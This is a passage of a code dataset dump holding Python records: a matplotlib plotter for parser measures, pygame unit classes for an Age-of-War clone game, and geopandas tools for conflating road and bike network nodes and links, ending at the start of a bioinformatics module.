/usr/bin/env python\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\"\"\"\nPlots measures from the parser measures output\n\"\"\"\n\ndef plot_measures(csvfilename=None,datatable=None,select=[True,True,True],labels=None,row_indexes=None,label_rotation=45):\n \"\"\"\n Plots up to two measures for a given text.\n \n @param csvfilename: file where to find the data\n @param datatable : panda data frame where to find the data\n @param select : selects measures to plot [UnkWord,Surprisal,StructuralComplexity] at most two can be selected\n @param labels : labels for the measures on the plot\n @param row_indexes: a list of integer indexes that allows (discontinuous) subsetting of the data\n \"\"\"\n assert((not csvfilename is None) or (not datatable is None))\n assert(sum(select) <= 2)\n assert(len(labels) == sum(select))\n\n if csvfilename:\n df = pd.read_table(csvfilename,sep=\",\",index_col=0)\n elif datatable:\n df = datatable.copy()\n \n #col subsetting\n sub_idxes = [0]+[ idx+1 for idx, flag in enumerate(select) if flag]\n print(sub_idxes)\n df = df[df.columns[sub_idxes]]\n df.columns=['tokens']+labels\n \n #row subsetting\n df = df.iloc[row_indexes]\n df.set_index(\"tokens\",drop=True,inplace=True)\n print(df)\n if len(labels) > 1:\n axes = df.plot(title=' and '.join(labels)+' per word',secondary_y=labels[1],mark_right=False,kind='bar',rot=label_rotation) \n axes.set_ylabel('%s scale'%(labels[0]))\n axes.right_ax.set_ylabel('%s scale'%(labels[1]))\n else:\n axes = df.plot(title=labels[0]+' per word',kind='bar',rot=label_rotation)\n axes.set_ylabel(labels[0])\n axes.set_xlabel('')\n \nif __name__ == '__main__':\n plt.style.use('ggplot')\n plot_measures(csvfilename='exemple_measures.csv',select=[False,True,True],labels=['Surprisal','Complexity'],row_indexes=list(range(13,25)))\n plt.show()\n","repo_name":"bencrabbe/parsing_as_LM","sub_path":"rnng/plotting/plot_measures.py","file_name":"plot_measures.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"12398035340","text":"import pygame\nfrom pygame.image import load\nfrom settings import WARRIOR_PATH as warrior\nfrom settings import ARCHER_PATH as archer\nimport dataclasses\n@dataclasses.dataclass\nclass Status:\n cost: int\n health: int\n demage: int\n move_speed: int\n animation_time: int\n movement: bool\n attack: bool\n\nclass UnitsGroup(pygame.sprite.Group):\n def draw(self, surface, offset_x, offset_y):\n sprites = self.sprites()\n surface_blit = surface.blit\n 
for spr in sprites:\n self.spritedict[spr] = surface_blit(spr.image, (spr.rect.x + offset_x, spr.rect.y + offset_y))\n self.lostsprites = []\n\n\nclass SwordMan(pygame.sprite.Sprite):\n def __init__(self, pos_x, pos_y):\n super().__init__()\n # LOADING SPRITES\n self.name = \"SwordMan\"\n self.load_sprites()\n self.image = self.sword_man_walking[self.current_sword_man_sprite]\n self.rect = self.image.get_rect(topleft=(pos_x, pos_y))\n # SWORDMAN STATUS\n self.status = Status(15, 2000, 1700, 100, 8, True, False)\n self.vector_direction = pygame.math.Vector2(self.rect.topleft)\n\n def load_sprites(self):\n self.sword_man_walking = []\n self.sword_man_attack = []\n self.display_surface = pygame.display.get_surface()\n # LOADING SPRITES\n for img in range(10):\n self.sword_man_walking.append(\n load(f\"{warrior}walking/warrior{img}.png\").convert_alpha()\n )\n for img in range(11):\n self.sword_man_attack.append(load\n (f\"{warrior}attacking/attack{img}.png\").convert_alpha()\n )\n self.current_sword_man_sprite = 0\n self.attack_animation_sprite = 0\n\n def walking_animation(self, dt):\n if self.status.movement:\n self.current_sword_man_sprite += (self.status.animation_time * dt)\n if self.current_sword_man_sprite >= len(self.sword_man_walking):\n self.current_sword_man_sprite = 0\n\n def attacking_animations(self, dt, enemy):\n self.status.attack = True\n self.status.movement = False\n if self.status.attack:\n self.attack_animation_sprite += (self.status.animation_time * dt)\n if self.attack_animation_sprite >= len(self.sword_man_attack):\n self.attack_animation_sprite = 0\n if enemy == -1:\n self.image = pygame.transform.flip(self.sword_man_attack[int(self.attack_animation_sprite)], True,\n False)\n else:\n self.image = self.sword_man_attack[int(self.attack_animation_sprite)]\n\n def movement(self, dt, enemy):\n prev_x = self.vector_direction.x\n if self.status.movement:\n self.vector_direction.x += (self.status.move_speed * dt) * enemy\n self.rect.x = round(self.vector_direction.x)\n if self.vector_direction.x <= prev_x and enemy == -1:\n self.image = pygame.transform.flip(self.sword_man_walking[int(self.current_sword_man_sprite)], True, False)\n else:\n self.image = self.sword_man_walking[int(self.current_sword_man_sprite)]\n\n\n def stop_movement(self):\n self.status.movement = False\n\n\n def enabled_movement(self):\n self.status.movement = True\n\n\n def draw_hp(self,camera):\n hp_width = self.status.health / 40\n hp_height = 4\n offset_x = self.rect.x + camera + 8\n offset_y = self.rect.y + 80\n try:\n player_hp = pygame.Surface((hp_width, hp_height))\n player_hp.fill((255,0,0))\n self.display_surface.blit(player_hp,(offset_x,offset_y))\n except pygame.error:\n pass\n\n def demage(self):\n return self.status.demage\n \n def isattacked(self):\n if self.attack_animation_sprite > 8:\n return True\n return False\n \n\n def attack(self, dt, enemy):\n self.attacking_animations(dt, enemy)\n\n def update(self, dt, enemy):\n self.movement(dt, enemy)\n self.walking_animation(dt)\n\n\nclass Archer(pygame.sprite.Sprite):\n def __init__(self, pos_x, pos_y):\n super().__init__()\n # Loading sprites\n self.name = \"Archer\"\n self.load_sprites()\n self.image = self.archer_walking[self.index_walking_sprite]\n self.rect = self.image.get_rect(topleft=(pos_x, pos_y))\n # ARCHMAN STATUS\n self.status = Status(35, 3000, 1000, 50, 12, True, False)\n self.vector_direction = pygame.math.Vector2(self.rect.topleft)\n\n def load_sprites(self):\n self.display_surface = pygame.display.get_surface()\n 
self.archer_walking = []\n self.archer_attack = []\n for walk in range(10):\n self.archer_walking.append(load\n (f\"{archer}walk/player_walk{walk}.png\").convert_alpha()\n )\n for attack in range(10):\n self.archer_attack.append(load\n (f\"{archer}attack/attack{attack}.png\").convert_alpha()\n )\n self.index_walking_sprite = 0\n self.index_attacking_sprite = 0\n\n def walking_animation(self, dt):\n if self.status.movement:\n self.index_walking_sprite += (self.status.animation_time * dt)\n if self.index_walking_sprite >= len(self.archer_walking):\n self.index_walking_sprite = 0\n\n def attacking_animations(self, dt, isenemy):\n self.status.attack = True\n self.status.movement = False\n if self.status.attack:\n self.index_attacking_sprite += (self.status.animation_time * dt)\n if self.index_attacking_sprite >= len(self.archer_attack):\n self.index_attacking_sprite = 0\n if isenemy == 1:\n self.image = pygame.transform.flip(\n self.archer_attack[int(self.index_attacking_sprite)],\n True,\n False\n )\n else:\n self.image = self.archer_attack[int(self.index_attacking_sprite)]\n def release_arrow_time(self):\n if self.index_attacking_sprite > 8.0 and self.index_attacking_sprite < 9.0:\n return True\n return False\n def movement(self, dt, enemy):\n prev_x = self.vector_direction.x\n if self.status.movement:\n self.vector_direction.x += (self.status.move_speed * dt) * enemy\n self.rect.x = round(self.vector_direction.x)\n if self.vector_direction.x < prev_x and enemy == -1:\n self.image = pygame.transform.flip(self.archer_walking[int(self.index_walking_sprite)], True, False)\n else:\n self.image = self.archer_walking[int(self.index_walking_sprite)]\n\n def stop_movement(self):\n self.status.movement = False\n\n\n def enabled_movement(self):\n self.status.movement = True\n\n\n def draw_hp(self,camera):\n hp_width = self.status.health / 60\n hp_height = 4\n offset_x = self.rect.x + camera + 8\n offset_y = self.rect.y + 115\n try:\n player_hp = pygame.Surface((hp_width, hp_height))\n player_hp.fill((255,0,0))\n self.display_surface.blit(player_hp,(offset_x,offset_y))\n except pygame.error:\n pass\n \n def demage(self):\n return self.status.demage\n \n\n def isattacked(self):\n if self.index_attacking_sprite > 8:\n return True\n return False\n \n\n def attack(self, dt,isenemy):\n self.attacking_animations(dt, isenemy)\n\n def update(self, dt, enemy):\n self.movement(dt, enemy)\n self.walking_animation(dt)\n\n\nclass Dragon(pygame.sprite.Sprite):\n def __init__(self):\n super().__init__()\n pass\n","repo_name":"ediblelic/Age-of-War-Clone","sub_path":"code/unit.py","file_name":"unit.py","file_ext":"py","file_size_in_byte":7904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16181369607","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 4 14:56:07 2021\n\n@author: tpassmore6\n\"\"\"\n\n#%%\nimport geopandas as gpd\nimport pandas as pd\nimport numpy as np\nimport os\nimport time\npd.options.display.max_columns = None # display all columns\npd.options.display.max_rows = None # display all columns\nfrom shapely import wkt\nfrom shapely.wkt import dumps\nfrom shapely.ops import transform\nfrom shapely.ops import split, snap\nfrom shapely.geometry import Point, LineString, Polygon, MultiPoint, MultiLineString, mapping\nimport shapely\nimport pyproj\nfrom itertools import compress\nimport pickle\nfrom collections import Counter\nimport math\nfrom pathlib import Path\nfrom node_ids import start_node, end_node\n\n\ndef 
cleaning_process(links, nodes, name):\n \n #column names for A, B, and/or linkID\n mask = [f'{name}_A_B','geometry']\n \n #use mask to only keep neccessary columns\n links = links[mask]\n \n #rename geometry collumns\n links = links.rename(columns={'geometry':f'{name}_line_geo'}).set_geometry(f'{name}_line_geo')\n nodes = nodes.rename(columns={'geometry':f'{name}_point_geo'}).set_geometry(f'{name}_point_geo')\n\n return links, nodes\n\n\n\n# Match Points Function\n\n#base function\n#https://gis.stackexchange.com/questions/222315/geopandas-find-nearest-point-in-other-dataframe\n\nfrom scipy.spatial import cKDTree\n\n#take in two geometry columns and find nearest gdB point from each\n#point in gdA. Returns the matching distance too.\n#MUST BE PROJECTED COORDINATE SYSTEM\ndef ckdnearest(gdA, gdB, return_dist=True): \n \n nA = np.array(list(gdA.geometry.apply(lambda x: (x.x, x.y))))\n nB = np.array(list(gdB.geometry.apply(lambda x: (x.x, x.y))))\n btree = cKDTree(nB)\n dist, idx = btree.query(nA, k=1)\n gdB_nearest = gdB.iloc[idx].reset_index(drop=True)\n \n gdf = pd.concat(\n [\n gdA.reset_index(drop=True),\n gdB_nearest,\n pd.Series(dist, name='dist')\n ], \n axis=1)\n \n if return_dist == False:\n gdf = gdf.drop(columns=['dist'])\n \n return gdf\n\ndef match_nodes(base_nodes, base_name, join_nodes, join_name, tolerance_ft, prev_matched_nodes = None, remove_duplicates = True, export_error_lines = False, export_unmatched = False):\n \n #from each base node, find the nearest join node\n closest_nodes = ckdnearest(base_nodes, join_nodes)\n\n #filter out matched nodes where the match is greater than specified amount aka tolerence, 26ft seemed good\n matched_nodes = closest_nodes[closest_nodes['dist'] <= tolerance_ft]\n \n #print out the initial number of matches\n print(f'{len(matched_nodes)} initial matches')\n \n #if there are one to many matches, then remove_duplicates == True will only keep the match with the smallest match distance\n #set to false if you want to deal with these one to many joins manually\n if remove_duplicates == True: \n \n #find duplicate matches\n duplicate_matches = matched_nodes[matched_nodes[f'{join_name}_ID'].duplicated(keep=False)]\n \n #if two or base nodes match to the same join nodes, then only match the one with the smaller distance\n duplicate_matches_removed = matched_nodes.groupby([f'{join_name}_ID'], sort=False)['dist'].min()\n \n #used df_2 id to join back to matched nodes\n matched_nodes = pd.merge(matched_nodes, duplicate_matches_removed, how = 'inner', \n on=[f'{join_name}_ID','dist'], suffixes=(None,'_dup'))\n \n print(f'There were {len(duplicate_matches)} duplicates, now there are {len(matched_nodes)} matches.')\n \n else:\n #mark which ones have been duplicated\n duplicate_matches = matched_nodes[matched_nodes[f'{join_name}_ID'].duplicated(keep=False)]\n print(f'There are {len(duplicate_matches)} duplicate matches.')\n\n #if this is set to true, it will export a geojson of lines between the matched nodes\n #can be useful for visualizing the matching process\n if export_error_lines == True:\n #make the lines\n error_lines_geo = matched_nodes.apply(\n lambda row: LineString([row[f'{base_name}_point_geo'], row[f'{join_name}_point_geo']]), axis=1)\n #create geodataframe\n error_lines = gpd.GeoDataFrame({f\"{base_name}_ID\":matched_nodes[f\"{base_name}_ID\"],\n f\"{join_name}_ID\":matched_nodes[f\"{join_name}_ID\"],\n \"geometry\":error_lines_geo}, geometry = \"geometry\")\n #export it to file\n error_lines.to_file(\n 
rf'processed_shapefiles/matched_nodes/{base_name}_matched_to_{join_name}_{tolerance_ft}_errorlines.geojson', driver = 'GeoJSON')\n \n #drop join geometry and make sure base geometry active\n matched_nodes = matched_nodes.filter([f'{base_name}_ID', f'{join_name}_ID'], axis = 1)\n \n # find remaining nodes for both networks to manage which ones have been merged\n #unmatched base nodes\n unmatched_base_nodes = base_nodes[-base_nodes[f'{base_name}_ID'].isin(matched_nodes[f'{base_name}_ID'])]\n \n #unmatched join nodes\n unmatched_join_nodes = join_nodes[-join_nodes[f'{join_name}_ID'].isin(matched_nodes[f'{join_name}_ID'])]\n \n #if there was a previous match process, merge the old matching one with the new one\n if prev_matched_nodes != None:\n matched_nodes = prev_matched_nodes.append(matched_nodes) \n \n if export_unmatched == True:\n unmatched_base_nodes.to_file(rf'processed_shapefiles/conflation/matched_nodes/unmatched_{base_name}_nodes.geojson', driver = 'GeoJSON')\n unmatched_join_nodes.to_file(rf'processed_shapefiles/conflation/matched_nodes/unmatched_{join_name}_nodes.geojson', driver = 'GeoJSON')\n \n print(f'There are {len(unmatched_base_nodes)} {base_name} nodes and {len(unmatched_join_nodes)} {join_name} nodes remaining')\n print(f'{len(matched_nodes)} node pairs have been matched so far.')\n \n \n return matched_nodes, unmatched_base_nodes, unmatched_join_nodes\n\n\n# splitting base links by nearest joining nodes\n\n#this function finds the nearest point on a base link from every join node\n#this interpolated point will then be used to split the base link\ndef point_on_line(unmatched_join_nodes, join_name, base_links, base_name, tolerance_ft):\n split_points = pd.DataFrame() # dataframe for storing the corresponding interpolated point information \n line_to_split = pd.DataFrame() # dataframe for storing the correspoding base link information\n \n # loop through every unmatched point, as long as the point lies on one link of the whole newtork, it would be identified as lying on the base network\n for index, row in unmatched_join_nodes.iterrows():\n # check if row in unmatched_join_nodes distance to all linestrings in base_links\n on_bool_list = base_links[f\"{base_name}_line_geo\"].distance(row[f\"{join_name}_point_geo\"]) < tolerance_ft \n if any(on_bool_list) == True: # if this row matches to base_links feature within the tolerance\n line_idx = list(compress(range(len(on_bool_list)), on_bool_list)) # find the corresponding line\n target_line = base_links.loc[line_idx[0],f\"{base_name}_line_geo\"]\n interpolated_point = target_line.interpolate(target_line.project(row[f\"{join_name}_point_geo\"])) # find the interpolated point on the line\n unmatched_join_nodes.at[index, f\"{base_name}_lie_on\"] = \"Y\"\n split_points.at[index, f\"{base_name}_split_point_wkt\"] = str(Point(interpolated_point)).strip() \n line_to_split.at[index, f\"{base_name}_split_line_wkt\"] = str(LineString(target_line)).strip()\n split_points.at[index, f\"{join_name}_ID\"] = row[f\"{join_name}_ID\"]\n split_points.at[index, f\"{base_name}_A_B\"] = base_links.loc[line_idx[0], f\"{base_name}_A_B\"]\n line_to_split.at[index, f\"{join_name}_ID\"] = row[f\"{join_name}_ID\"]\n line_to_split.at[index, f\"{base_name}_A_B\"] = base_links.loc[line_idx[0], f\"{base_name}_A_B\"]\n else:\n unmatched_join_nodes.at[index, f\"{base_name}_lie_on\"] = \"N\"\n\n #update the unmatced nodes\n unmatched_join_nodes = unmatched_join_nodes[unmatched_join_nodes[f\"{base_name}_lie_on\"] == \"N\"].reset_index(drop = True)\n 
unmatched_join_nodes.drop(columns=[f\"{base_name}_lie_on\"], inplace = True)\n \n #convert everything to a geodataframe but keep wkt column\n split_points = split_points.reset_index(drop = True)\n split_points[f\"{base_name}_split_point_geo\"] = split_points[f\"{base_name}_split_point_wkt\"].apply(wkt.loads) # transform from df to gdf\n split_points = gpd.GeoDataFrame(split_points,geometry=f\"{base_name}_split_point_geo\")\n\n line_to_split = line_to_split.reset_index(drop = True)\n line_to_split[f\"{base_name}_split_line_geo\"] = line_to_split[f\"{base_name}_split_line_wkt\"].apply(wkt.loads)\n line_to_split = gpd.GeoDataFrame(line_to_split,geometry=f\"{base_name}_split_line_geo\")\n \n return split_points, line_to_split, unmatched_join_nodes\n\n\n# add node to existing links\n# idea behind:\n## step 1:return the multistring as a string first (dataframe), since multistring does not split into \n## individual linestring segment, but just add element to list of linestrings\n\n## step 2: expand list of linestring column into several rows, return a dataframe with more rows \n\n## step 3: turn the dataframe into a geodataframe\n\ndef get_linesegments(point, line): # function to split line into MultiLineString (ATTENTION: not into individual segments, but to MultiLineString)\n return line.difference(point.buffer(1e-6)) #IMPORTANT: add a buffer here make sure it works\n\ndef split_by_nodes(line_to_split, split_points, base_name):\n ab_list = split_points[f\"{base_name}_A_B\"].unique().tolist()\n line_to_split = line_to_split.drop_duplicates(subset = [f\"{base_name}_A_B\"]) # multiple points could line on the same link, drop duplicates first\n df_split = pd.DataFrame(columns = {f\"{base_name}_A_B\",f\"{base_name}_wkt\"}) # dataframe for storing splitted multistring\n df_split[f\"{base_name}_A_B\"] = ab_list\n \n for idx, row in df_split.iterrows():\n ab = row[f\"{base_name}_A_B\"]\n df_ab = split_points[split_points[f\"{base_name}_A_B\"] == ab]\n ab_point = MultiPoint([x for x in df_ab[f\"{base_name}_split_point_geo\"]])\n ab_line = line_to_split[line_to_split[f\"{base_name}_A_B\"] == ab][f\"{base_name}_split_line_geo\"].values[0]\n split_line = get_linesegments(ab_point, ab_line) # split_line is a geo multilinestring type\n # ATTENTION: format the decimal places to make every row the same, this is important for successfully turning string to geopandas geometry\n # use dump to always get 16 decimal digits irregardles of the total number of digits, dump() change it to MultiLineString to string type\n split_line = dumps(split_line) \n df_split.at[idx, f\"{base_name}_wkt\"] = split_line\n \n df_split[f'{base_name}_line_geo'] = df_split[f\"{base_name}_wkt\"].apply(wkt.loads)\n df_split = gpd.GeoDataFrame(df_split,geometry=f'{base_name}_line_geo')\n \n #convert from multilinestring to segments\n df_split = df_split.explode().reset_index(drop=True)\n \n return df_split\n\ndef split_lines_create_points(unmatched_join_nodes, join_name, base_links, base_name, tolerance_ft, export = False):\n \n #get CRS information\n desired_crs = base_links.crs\n \n #note that these function use WKT to do the splitting rather than shapely geometry\n split_points, line_to_split, unmatched_join_nodes = point_on_line(unmatched_join_nodes, join_name, base_links, base_name, tolerance_ft) #finds the split points\n print(f\"There are {len(split_points.index)} {join_name} points matching to {len(line_to_split[f'{base_name}_A_B'].unique())} {base_name} links\")\n print(f'There are {len(unmatched_join_nodes)} {join_name} nodes 
remaining')\n \n #splits the lines by nodes found in previous function\n split_lines = split_by_nodes(line_to_split, split_points, base_name) \n print(f'There were {len(split_lines)} new lines created.')\n \n #drop the wkt columns and A_B column for points\n split_points.drop(columns=[f'{base_name}_split_point_wkt',f'{base_name}_A_B'], inplace=True)\n split_lines.drop(columns=[f'{base_name}_wkt'], inplace=True)\n \n #project gdfs\n split_points.set_crs(desired_crs, inplace=True)\n split_lines.set_crs(desired_crs, inplace=True)\n\n if export == True:\n #write these to file\n split_lines.to_file(\"processed_shapefiles/conflation/line_splitting/split_lines.geojson\", driver = \"GeoJSON\")\n split_points.to_file(\"processed_shapefiles/conflation/line_splitting/split_points.geojson\", driver = \"GeoJSON\")\n\n return split_lines, split_points, unmatched_join_nodes\n\n\n# function to add new nodes/links\ndef add_new_links_nodes(base_links, base_nodes, new_links, new_nodes, base_name):\n\n #remove links that were splitted\n mask = -base_links[f'{base_name}_A_B'].isin(new_links[f'{base_name}_A_B'])\n base_links = base_links[mask]\n \n #add new links\n base_links = base_links.append(new_links)\n \n #rename geo col\n new_nodes = new_nodes.rename(columns={f'{base_name}_split_point_geo':f'{base_name}_point_geo'}).set_geometry(f'{base_name}_point_geo')\n \n #add split nodes to nodes with the here match\n base_nodes = base_nodes.append(new_nodes)\n \n return base_links, base_nodes\n\ndef add_attributes(base_links, base_name, join_links, join_name):\n \n #give base_links a temp column so each row has unique identifyer\n base_links['temp_ID'] = np.arange(base_links.shape[0]).astype(str)\n \n #buffer base links by 30 ft (or whatever the projected coord unit is)\n base_links['buffer_geo'] = base_links.buffer(30)\n base_links = base_links.set_geometry('buffer_geo')\n \n #export buffer for examination\n base_links.drop(columns={f'{base_name}_line_geo'}).to_file(rf'Processed_Shapefiles/conflation/add_attributes/{base_name}_buffer.geojson', driver = 'GeoJSON')\n \n #calculate initial length of join links\n join_links['original_length'] = join_links.length\n \n #perform overlay with join links\n overlapping_links = gpd.overlay(join_links, base_links, how='intersection')\n \n #overlap length\n overlapping_links['overlap_length'] = overlapping_links.length \n \n #for each base link find join link with greatest percent overlap\n overlapping_links = overlapping_links.loc[overlapping_links.groupby('temp_ID')['overlap_length'].idxmax()]\n \n #merge the join_A_B column to base_links by temp ID\n base_links = pd.merge(base_links, overlapping_links[['temp_ID',f'{join_name}_A_B']], on = 'temp_ID', how = 'left')\n \n #clean up base_links\n base_links.drop(columns=['temp_ID','buffer_geo'], inplace = True)\n \n #reset active geo\n base_links = base_links.set_geometry(f'{base_name}_line_geo')\n\n #export final result\n base_links.to_file(rf'Processed_Shapefiles/conflation/add_attributes/{base_name}_joined.geojson', driver = 'GeoJSON')\n\n return base_links\n\n\n\ndef start_node_geo(row, geom):\n return (Point(row[geom].coords.xy[0][0], row[geom].coords.xy[1][0])) \n\ndef end_node_geo(row, geom):\n return (Point(row[geom].coords.xy[0][-1], row[geom].coords.xy[1][-1]))\n\ndef add_rest_of_features(base_links,base_nodes,base_name,join_links,join_nodes,join_name):\n \n #find the nodes that are not present\n unadded_nodes = join_nodes[-join_nodes[f'{join_name}_ID'].isin(base_nodes[f'{join_name}_ID'])]\n \n #add them\n base_nodes = 
base_nodes.append(unadded_nodes)\n \n #find the links that are not present\n unadded_links = join_links[-join_links[f'{join_name}_A_B'].isin(base_links[f'{join_name}_A_B'])]\n \n #add them\n base_links = base_links.append(unadded_links)\n \n #merge the geometry columns into one called bikewaysim\n base_links[f'{base_name}_line_geo'] = base_links.apply(\n lambda row: row[f'{join_name}_line_geo'] if row[f'{base_name}_line_geo'] is None else row[f'{base_name}_line_geo'], axis = 1)\n \n base_nodes[f'{base_name}_point_geo'] = base_nodes.apply(\n lambda row: row[f'{join_name}_point_geo'] if row[f'{base_name}_point_geo'] is None else row[f'{base_name}_point_geo'], axis = 1)\n \n #drop the excess geo column, make sure base is set to active geometry\n base_links = base_links.drop(columns=[f'{join_name}_line_geo','original_length']).set_geometry(f'{base_name}_line_geo')\n base_nodes = base_nodes.drop(columns=[f'{join_name}_point_geo']).set_geometry(f'{base_name}_point_geo')\n \n return base_links, base_nodes\n \ndef merge_diff_networks(base_links, base_nodes, base_type, join_links, join_nodes, join_type, tolerance_ft):\n \n #notes\n #merging network could have the same nodes\n #don't mess with ref id till end\n #need to consider how many ids there will be\n \n #first find nodes that are already present and don't add them\n \n #get network names for each network\n base_cols = list(base_nodes.columns)\n base_ids = [base_cols for base_cols in base_cols if \"_ID\" in base_cols]\n \n join_cols = list(join_nodes.columns)\n join_ids = [join_cols for join_cols in join_cols if \"_ID\" in join_cols]\n \n #get list of common names between networks\n common_ids = [base_ids for base_ids in base_ids if base_ids in join_ids]\n \n #remove join_nodes that are in base_nodes\n initial_nodes = len(join_nodes)\n \n for name in common_ids:\n join_nodes = join_nodes[-join_nodes[name].isin(base_nodes[name])]\n \n final_nodes = len(join_nodes)\n print(f'{initial_nodes - final_nodes} nodes already in the base network')\n \n #add rest of join nodes to base nodes\n base_nodes = base_nodes.append(join_nodes)\n \n #get geo names\n base_line_geo = base_links.geometry.name\n base_point_geo = base_nodes.geometry.name\n join_line_geo = join_links.geometry.name\n join_point_geo = join_nodes.geometry.name\n \n #call the match nodes function to form connections between nodes\n base_nodes_to_match = base_nodes.add_suffix(f'_{base_type}').set_geometry(f'{base_point_geo}_{base_type}')\n join_nodes_to_match = join_nodes.add_suffix(f'_{join_type}').set_geometry(f'{join_point_geo}_{join_type}')\n \n print(base_nodes_to_match.geometry.isnull().any())\n print(join_nodes_to_match.isnull().any())\n \n #this isn't working\n #connections = ckdnearest(base_nodes_to_match,join_nodes_to_match)\n #connections = connections[connections['dist'] <= tolerance_ft]\n\n #only keep connections if there is not already a connection in respective column\n #for name in common_ids:\n # rem_cond = connections[f'{name}_{base_type}'] == connections[f'{name}_{join_type}']\n # connections = connections[-rem_cond]\n \n #add all the links\n base_links = base_links.append(join_links)\n \n #merge the geometry columns into one\n base_links[base_links.geometry.name] = base_links.apply(\n lambda row: row[join_links.geometry.name] if row[base_links.geometry.name] is None else row[base_links.geometry.name], axis = 1)\n \n base_nodes[base_nodes.geometry.name] = base_nodes.apply(\n lambda row: row[join_nodes.geometry.name] if row[base_nodes.geometry.name] is None else 
row[base_nodes.geometry.name], axis = 1)\n \n #drop the excess geo column, make sure base is set to active geometry\n base_links = base_links.drop(columns=[join_line_geo]).set_geometry(base_line_geo)\n base_nodes = base_nodes.drop(columns=[join_point_geo]).set_geometry(base_point_geo)\n\n return base_links, base_nodes#, connections\n \ndef add_reference_ids(links, nodes):\n\n #get network names\n cols = list(nodes.columns)\n id_cols = [cols for cols in cols if \"_ID\" in cols]\n names = [id_cols.split('_')[0] for id_cols in id_cols]\n \n #filter nodes\n id_cols.append(nodes.geometry.name)\n nodes = nodes[id_cols]\n \n #get name of geo column\n links_geo = links.geometry.name\n \n #match id to starting node\n links['start_point_geo'] = links.apply(start_node_geo, geom= links.geometry.name, axis=1)\n \n #set to active geo\n links = links.set_geometry('start_point_geo')\n \n #find nearest node from starting node\n links = ckdnearest(links,nodes,return_dist=False)\n \n #rename id columns to _A\n links.columns = pd.Series(list(links.columns)).str.replace('_ID','_A')\n\n #remove start node and base_node_geo columns\n links = links.drop(columns=['start_point_geo',nodes.geometry.name])\n \n #reset geometry\n links = links.set_geometry(links_geo)\n \n \n #do same for end point\n links['end_point_geo'] = links.apply(end_node_geo, geom= links.geometry.name, axis=1)\n \n #set active geo\n links = links.set_geometry('end_point_geo')\n \n #find nearest node from starting node\n links = ckdnearest(links,nodes,return_dist=False)\n \n #rename id columns to _A\n links.columns = pd.Series(list(links.columns)).str.replace('_ID','_B')\n \n #remove end point\n links = links.drop(columns=['end_point_geo',nodes.geometry.name])\n \n #reset geometry \n links = links.set_geometry(links_geo)\n\n #check for missing ref ids\n cols = list(links.columns)\n a_cols = [cols for cols in cols if \"_A\" in cols]\n b_cols = [cols for cols in cols if \"_B\" in cols]\n \n #first see any As are missing\n a_missing = links[a_cols].apply(lambda row: row.isnull().all(), axis = 1)\n \n #then see if any Bs are missing\n b_missing = links[b_cols].apply(lambda row: row.isnull().all(), axis = 1)\n \n if a_missing.any() == True | b_missing.any() == True:\n print(\"There are missing reference ids\")\n \n return links\n\n\n#%% for testing move this to jupyter notebook after\n\n\n# #this is what you edit\n# base_name = \"abm\"\n# join_name = \"here\"\n\n# base_links = gpd.read_file(r\"C:/Users/tpassmore6/Documents/GitHub/BikewaySimDev/processed_shapefiles/abm/abm_bikewaysim_road_links.geojson\")\n# base_nodes = gpd.read_file(r\"C:/Users/tpassmore6/Documents/GitHub/BikewaySimDev/processed_shapefiles/abm/abm_bikewaysim_road_nodes.geojson\")\n# join_links = gpd.read_file(r\"C:/Users/tpassmore6/Documents/GitHub/BikewaySimDev/processed_shapefiles/here/here_bikewaysim_road_links.geojson\")\n# join_nodes = gpd.read_file(r\"C:/Users/tpassmore6/Documents/GitHub/BikewaySimDev/processed_shapefiles/here/here_bikewaysim_road_nodes.geojson\")\n\n# #%% conflation steps\n\n# #get rid of excess columns\n# base_links, base_nodes = cleaning_process(base_links,base_nodes,base_name)\n# join_links, join_nodes = cleaning_process(join_links,join_nodes,join_name)\n\n# #first match the nodes, can repeat this by adding in previously matched_nodes\n# tolerance_ft = 25\n# matched_nodes, unmatched_base_nodes, unmatched_join_nodes = match_nodes(base_nodes, base_name, join_nodes, join_name, tolerance_ft, prev_matched_nodes=None)\n\n# #join the matched nodes to the base 
nodes once done with matching\n# matched_nodes_final = pd.merge(base_nodes, matched_nodes, on = f'{base_name}_ID', how = \"left\")\n\n# #create new node and lines from the base links by splitting lines can repeat after the add_new_links_nodes function\n# tolerance_ft = 25\n# split_lines, split_nodes, unmatched_join_nodes = split_lines_create_points(unmatched_join_nodes, join_name, base_links, base_name, tolerance_ft, export = False)\n\n# #add new links and nodes to the base links and nodes created from split_lines_create_points function\n# new_links, new_nodes = add_new_links_nodes(base_links, matched_nodes_final, split_lines, split_nodes, base_name)\n\n# #match attribute information with greatest overlap from joining links\n# new_base_links_w_attr = add_attributes(new_links, base_name, join_links, join_name)\n\n\n# #add unrepresented features from joining by looking at the attributes added in prevoius step for links and the list of matched nodes\n# added_base_links, added_base_nodes = add_rest_of_features(new_base_links_w_attr,new_nodes,base_name,join_links,join_nodes,join_name)\n\n# #merge other conflated networks into this\n# #import a bike layer\n# bike_links = gpd.read_file(r'C:/Users/tpassmore6/Documents/GitHub/BikewaySimDev/processed_shapefiles/here/here_bikewaysim_bike_links.geojson')\n# bike_nodes = gpd.read_file(r'C:/Users/tpassmore6/Documents/GitHub/BikewaySimDev/processed_shapefiles/here/here_bikewaysim_bike_nodes.geojson')\n# bike_name = 'here'\n\n# #clean excess columns\n# bike_links, bike_nodes = cleaning_process(bike_links,bike_nodes,bike_name)\n\n# #merge diff netwrks\n# tolerance_ft = 25\n# merged_links, merged_nodes, connections = merge_diff_networks(added_base_links, added_base_nodes, 'road', bike_links, bike_nodes, 'bike', tolerance_ft)\n\n# # match reference IDs based on all the id in the nodes\n# refid_base_links = add_reference_ids(merged_links, merged_nodes)\n\n# #export\n# refid_base_links\n# merged_nodes\n\n\n\n\n\n","repo_name":"gti-gatech/BikewaySim","sub_path":"conflation_tools.py","file_name":"conflation_tools.py","file_ext":"py","file_size_in_byte":24918,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"71781351369","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nfrom __future__ import unicode_literals, print_function\nimport sys\nfrom molbiox.frame.signature import Sig\n\nCHEAT = False\n\nambig_nucl = {\n 'M': 